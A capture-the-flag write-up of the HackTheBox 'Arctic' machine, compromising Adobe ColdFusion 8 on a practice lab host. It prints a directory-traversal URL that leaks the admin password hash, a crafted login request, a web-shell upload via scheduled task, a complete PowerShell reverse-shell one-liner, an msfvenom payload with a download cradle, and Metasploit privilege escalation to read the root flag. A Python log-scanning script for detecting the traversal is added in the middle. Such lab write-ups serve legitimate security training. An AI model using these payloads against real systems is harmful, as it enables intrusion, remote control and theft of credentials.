HackTheBox: Arctic

The first step was to run Nmap against the machine:

# Nmap 7.80 scan initiated Sat Sep 19 14:54:46 2020 as: nmap -sV -O -sC -p- -oN scan 10.10.10.11
Nmap scan report for 10.10.10.11
Host is up (0.021s latency).
Not shown: 65532 filtered ports
PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep 19 15:00:16 2020 -- 1 IP address (1 host up) scanned in 329.63 seconds

From the output we can see that MSRPC is running on ports 135 and 49154, and that something is listening on port 8500 which Nmap tentatively labelled FMTP (the trailing ? means the service was not fingerprinted, only guessed from the port number). I investigated port 8500 more closely and, after browsing to it, identified that it was running Adobe ColdFusion. Browsing to the administrator login page indicates that it is running version 8.

http://10.10.10.11:8500/CFIDE/administrator/index.cfm

There is an excellent resource by nets.ec on ColdFusion hacking that uses a local file disclosure vulnerability to log in to the administration panel. As described on that site, the first step is to use the LFI vulnerability to view the password.properties file by browsing to the URL below. The locale parameter is vulnerable to directory traversal, and the %00 null byte truncates the path so that the suffix ColdFusion appends after it is ignored:

http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en

This then shows us the hashed password value:

You then copy the hash into the password field and run the following JavaScript from the address bar (the hex_hmac_sha1 function is defined by the login page's own scripts, which is why it can be called from there):

javascript:alert(hex_hmac_sha1(document.loginform.salt.value,document.loginform.cfadminPassword.value))

This will generate an alert with the HMACed hash. This works because the login form HMACs the SHA-1 hash of the password with a server-supplied salt in the browser, so the server only ever compares against the stored hash; possession of that hash is therefore equivalent to possession of the password.

I then started up Burp and set it to intercept HTTP traffic, and submitted the login form from the ColdFusion admin panel. The request needs to be modified within Burp so that the cfadminPassword value matches the HMACed value reported in the JavaScript alert. My POST request looked like the following:

POST /CFIDE/administrator/enter.cfm HTTP/1.1
Host: 10.10.10.11:8500
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en
Content-Type: application/x-www-form-urlencoded
Content-Length: 422
Connection: close
Cookie: CFID=100; CFTOKEN=75808739
Upgrade-Insecure-Requests: 1

cfadminPassword=AD8AC0F171DEEACB68EA99CF11A19C4E2CFC9C97&requestedURL=%2FCFIDE%2Fadministrator%2Fenter.cfm%3Flocale%3D..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CColdFusion8%5Clib%5Cpassword.properties%2500en&salt=1601344007175&submit=%23Wed+Mar+22+20%3A53%3A51+EET+2017%0D%0Ardspassword%3D0IA%2FF%5B%5BE%3E%5B%24_6%26+%5C%5CQ%3E%5BK%5C%3DXP++%5Cn%0D%0Apassword%3D2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03%0D%0Aencrypted%3Dtrue
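From the defender's side, the LFI request and the login POST above leave a distinctive trail in the web server's access log. The following Python script is an added example (not from the original writeup or from nets.ec) that scans constructed sample log lines for the traversal sequence, the embedded null byte and the password.properties file name in any CFIDE administrator query parameter, undoing the nested percent-encoding seen in the requestedURL field; the log lines and the 192.0.2.7 client are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format), not from the original
# page. Line 2 repeats the traversal URL quoted in the writeup; line 3 carries the
# same path double-encoded in requestedURL, as in the login POST body; line 4 is benign.
SAMPLE_LOG = r"""
10.10.14.34 - - [19/Sep/2020:14:58:02 +0000] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 5123
10.10.14.34 - - [19/Sep/2020:14:59:10 +0000] "GET /CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en HTTP/1.1" 200 2311
10.10.14.34 - - [19/Sep/2020:15:03:44 +0000] "GET /CFIDE/administrator/enter.cfm?requestedURL=%2FCFIDE%2Fadministrator%2Fenter.cfm%3Flocale%3D..%255C..%255CColdFusion8%255Clib%255Cpassword.properties%2500en HTTP/1.1" 200 2311
192.0.2.7 - - [19/Sep/2020:15:05:00 +0000] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 2311
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')
TRAVERSAL_RE = re.compile(r'\.\.[\\/]')        # "../" or "..\" path segments
SENSITIVE_FILES = ('password.properties',)      # file named in the writeup; extend as needed


def decode_fully(value, max_rounds=4):
    """Undo nested percent-encoding: parse_qs strips one layer, and the writeup's
    requestedURL field carries another (%2500 -> %00 -> NUL)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_target(target):
    """Return sorted findings for a request under /CFIDE/administrator/, else []."""
    parts = urlsplit(target)
    if not parts.path.lower().startswith('/cfide/administrator/'):
        return []
    findings = set()
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for raw in values:
            value = decode_fully(raw)
            if TRAVERSAL_RE.search(value):
                findings.add(f'traversal in {name}')
            if '\x00' in value:
                findings.add(f'null byte in {name}')
            if any(f in value.lower() for f in SENSITIVE_FILES):
                findings.add(f'sensitive file in {name}')
    return sorted(findings)


def scan_log(text):
    """Parse each log line and collect an alert for every suspicious admin request."""
    alerts = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        src, when, _method, target, status, _size = match.groups()
        findings = inspect_target(target)
        if findings:
            alerts.append({'src': src, 'time': when, 'status': status,
                           'target': target, 'findings': findings})
    return alerts
```

Running scan_log(SAMPLE_LOG) returns two alerts for 10.10.14.34 (one for the raw locale traversal, one for the double-encoded requestedURL copy) and nothing for the benign requests.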

Once this modified POST request is forwarded from Burp to the ColdFusion server, you are logged in. I then continued to follow the guide to spawn a reverse shell on the machine. I opened the Scheduled Tasks menu on the left side of the ColdFusion admin panel and created a new scheduled task. I wanted to upload the CFM shell that ships with Kali, which can be found at /usr/share/webshells/cfm/cfexec.cfm. I started a Python HTTP server on my Kali machine to host this shell using the following:

python -m SimpleHTTPServer 8000

I then created the scheduled task in ColdFusion, making sure to enter the URL of the shell on my Kali machine and the path where I wanted the shell to be saved. The filesystem path of the web root can be found under Mappings in the admin panel.

I then submitted the scheduled task, executed it, and browsed to where I chose to save the shell. I was greeted with the shell, meaning the scheduled task had successfully downloaded and saved it from my Kali machine.

I then entered c:\windows\system32\cmd.exe into the command textbox and the following into the options box:

/c powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.34',2700);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" > C:\ColdFusion8\wwwroot\bs.txt

This will create a reverse shell back to my Kali machine on port 2700. I opened msfconsole and started a multi/handler on port 2700, then executed the PowerShell reverse shell from the ColdFusion web shell interface:

msf5 exploit(windows/http/rejetto_hfs_exec) > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf5 exploit(multi/handler) > set lport 2700
lport => 2700
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.34:2700 
[*] Command shell session 1 opened (10.10.14.34:2700 -> 10.10.10.11:54928) at 2020-09-28 13:07:26 -0400

PS C:\ColdFusion8\runtime\bin> cd /
PS C:\> cd Users
PS C:\Users> ls


    Directory: C:\Users


Mode                LastWriteTime     Length Name                              
----                -------------     ------ ----                              
d----         22/3/2017   8:10 ??            Administrator                     
d-r--         14/7/2009   7:57 ??            Public                            
d----         22/3/2017   9:00 ??            tolis                             


PS C:\Users> cd tolis
PS C:\Users\tolis> cd Desktop
PS C:\Users\tolis\Desktop> ls


    Directory: C:\Users\tolis\Desktop


Mode                LastWriteTime     Length Name                              
----                -------------     ------ ----                              
-ar--         22/3/2017   9:01 ??         32 user.txt                          


PS C:\Users\tolis\Desktop> cat user.txt 
[REDACTED]

From the output you can see that it executed successfully and I was able to read the user flag.

The next step is to perform privilege escalation. I started by elevating the basic reverse TCP shell to a Meterpreter shell. I used msfvenom to create an exe which can be executed from my current shell to spawn a Meterpreter session:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.38 LPORT=2901 -f exe > 0005.exe

This was then uploaded to the Arctic machine using the following:

powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.14.38:8000/0005.exe','0005.exe')"

I then started a multi/handler in Metasploit listening on port 2901 and ran it:

msf5 exploit(windows/http/rejetto_hfs_exec) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf5 exploit(multi/handler) > set lport 2901
lport => 2901
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.38:2901 

I then executed the exe:

C:\ColdFusion8\runtime\bin>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is F88F-4EA5

 Directory of C:\ColdFusion8\runtime\bin

03/10/2020  09:35 ��    <DIR>          .
03/10/2020  09:35 ��    <DIR>          ..
03/10/2020  09:29 ��            73.802 0005.exe
03/10/2020  09:34 ��    <DIR>          AppData
18/03/2008  12:11 ��            64.512 java2wsdl.exe
19/01/2008  10:59 ��         2.629.632 jikes.exe
18/03/2008  12:11 ��            64.512 jrun.exe
18/03/2008  12:11 ��            71.680 jrunsvc.exe
18/03/2008  12:11 ��             5.120 jrunsvcmsg.dll
18/03/2008  12:11 ��            64.512 jspc.exe
22/03/2017  09:53 ��             1.804 jvm.config
03/10/2020  08:10 ��                84 ll.bat
18/03/2008  12:11 ��            64.512 migrate.exe
18/03/2008  12:11 ��            34.816 portscan.dll
03/10/2020  09:33 ��            12.674 Powerless.bat
03/10/2020  08:11 ��                15 pp.bat
18/03/2008  12:11 ��            64.512 sniffer.exe
03/10/2020  09:35 ��           125.131 thoi.txt
18/03/2008  12:11 ��            78.848 WindowsLogin.dll
18/03/2008  12:11 ��            64.512 wsconfig.exe
22/03/2017  09:53 ��             1.013 wsconfig_jvm.config
18/03/2008  12:11 ��            64.512 wsdl2java.exe
18/03/2008  12:11 ��            64.512 xmlscript.exe
              20 File(s)      3.550.715 bytes
               3 Dir(s)  32.910.712.832 bytes free

C:\ColdFusion8\runtime\bin>0005.exe
0005.exe

C:\ColdFusion8\runtime\bin>

Once executed, the Meterpreter session was created:

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.38:2901 
[*] Sending stage (176195 bytes) to 10.10.10.11
[*] Meterpreter session 2 opened (10.10.14.38:2901 -> 10.10.10.11:53407) at 2020-10-02 06:48:17 -0400
[*] Sending stage (176195 bytes) to 10.10.10.11
[*] Meterpreter session 3 opened (10.10.14.38:2901 -> 10.10.10.11:53379) at 2020-10-02 06:48:18 -0400
[-] Failed to load client script file: /usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb

meterpreter > sysinfo
Computer        : ARCTIC
OS              : Windows 2008 R2 (6.1 Build 7600).
Architecture    : x64
System Language : el_GR
Domain          : HTB
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter >

Now with a Meterpreter session, I used the local exploit suggester to find a compatible exploit to use against the session:

msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester 
msf5 post(multi/recon/local_exploit_suggester) > set session 3
session => 3
msf5 post(multi/recon/local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION          3                yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.11 - Collecting local exploits for x64/windows...
[*] 10.10.10.11 - 17 exploit checks are being tried...
[+] 10.10.10.11 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.11 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[*] Post module execution completed

You can see from the output that there are multiple exploits it suggests will work. I decided to use MS16-014 in this case. I loaded the exploit, set it to target my Meterpreter session and ran it:

msf5 exploit(windows/local/ms16_075_reflection) > use exploit/windows/local/ms16_014_wmi_recv_notif 
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > set session 3
session => 3
msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > show options

Module options (exploit/windows/local/ms16_014_wmi_recv_notif):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  3                yes       The session to run this module on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.38      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 SP0/SP1


msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > run

[*] Started reverse TCP handler on 10.10.14.38:4444 
[*] Launching notepad to host the exploit...
[+] Process 300 launched.
[*] Reflectively injecting the exploit DLL into 300...
[*] Injecting exploit into 300...
[*] Exploit injected. Injecting payload into 300...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (201283 bytes) to 10.10.10.11
[*] Meterpreter session 4 opened (10.10.14.38:4444 -> 10.10.10.11:53424) at 2020-10-02 06:51:10 -0400

This successfully spawned a privileged session; from here I was able to access the Administrator desktop and retrieve the root flag:

meterpreter > cd /users
meterpreter > dir
Listing: C:\users
=================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   0     dir   2017-03-22 13:47:41 -0400  Administrator
40777/rwxrwxrwx   0     dir   2009-07-14 01:06:44 -0400  All Users
40555/r-xr-xr-x   0     dir   2009-07-13 23:20:08 -0400  Default
40777/rwxrwxrwx   0     dir   2009-07-14 01:06:44 -0400  Default User
40555/r-xr-xr-x   4096  dir   2009-07-13 23:20:08 -0400  Public
100666/rw-rw-rw-  174   fil   2009-07-14 00:57:55 -0400  desktop.ini
40777/rwxrwxrwx   8192  dir   2017-03-22 15:00:00 -0400  tolis

meterpreter > cd Administrator
meterpreter > dir
Listing: C:\users\Administrator
===============================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   0       dir   2017-03-22 13:47:42 -0400  AppData
40777/rwxrwxrwx   0       dir   2017-03-22 13:47:42 -0400  Application Data
40555/r-xr-xr-x   0       dir   2017-03-22 13:47:48 -0400  Contacts
40777/rwxrwxrwx   0       dir   2017-03-22 13:47:42 -0400  Cookies
40555/r-xr-xr-x   0       dir   2017-03-22 13:47:42 -0400  Desktop
40555/r-xr-xr-x   0       dir   2017-03-22 13:47:42 -0400  Documents
40555/r-xr-xr-x   0       dir   2017-03-22 13:47:42 -0400  Downloads
40555/r-xr-xr-x   0       dir   2017-03-22 13:47:42 -0400  Favorites
40777/rwxrwxrwx   0       dir   2017-03-22 14:10:31 -0400  InstallAnywhere
40555/r-xr-xr-x   0       dir   2017-03-22 13:47:42 -0400  Links
40777/rwxrwxrwx   0       dir   2017-03-22 13:47:42 -0400  Local Settings
40555/r-xr-xr-x   0       dir   2017-03-22 13:47:42 -0400  Music
40777/rwxrwxrwx   0       dir   2017-03-22 13:47:42 -0400  My Documents
100666/rw-rw-rw-  524288  fil   2017-03-22 13:47:41 -0400  NTUSER.DAT
100666/rw-rw-rw-  65536   fil   2017-03-22 13:47:42 -0400  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw-  524288  fil   2017-03-22 13:47:42 -0400  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw-  524288  fil   2017-03-22 13:47:42 -0400  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
40777/rwxrwxrwx   0       dir   2017-03-22 13:47:42 -0400  NetHood
40555/r-xr-xr-x   0       dir   2017-03-22 13:47:42 -0400  Pictures
40777/rwxrwxrwx   0       dir   2017-03-22 13:47:42 -0400  PrintHood
40777/rwxrwxrwx   0       dir   2017-03-22 13:47:42 -0400  Recent
40555/r-xr-xr-x   0       dir   2017-03-22 13:47:42 -0400  Saved Games
40555/r-xr-xr-x   0       dir   2017-03-22 13:47:48 -0400  Searches
40777/rwxrwxrwx   0       dir   2017-03-22 13:47:42 -0400  SendTo
40777/rwxrwxrwx   0       dir   2017-03-22 13:47:42 -0400  Start Menu
40777/rwxrwxrwx   0       dir   2017-03-22 13:47:42 -0400  Templates
40555/r-xr-xr-x   0       dir   2017-03-22 13:47:42 -0400  Videos
100666/rw-rw-rw-  262144  fil   2017-03-22 13:47:42 -0400  ntuser.dat.LOG1
100666/rw-rw-rw-  0       fil   2017-03-22 13:47:42 -0400  ntuser.dat.LOG2
100666/rw-rw-rw-  20      fil   2017-03-22 13:47:42 -0400  ntuser.ini

meterpreter > cd Desktop
meterpreter > dir
Listing: C:\users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2017-03-22 13:47:48 -0400  desktop.ini
100444/r--r--r--  32    fil   2017-03-22 15:01:59 -0400  root.txt

meterpreter > cat root.txt
[REDACTED]
meterpreter >
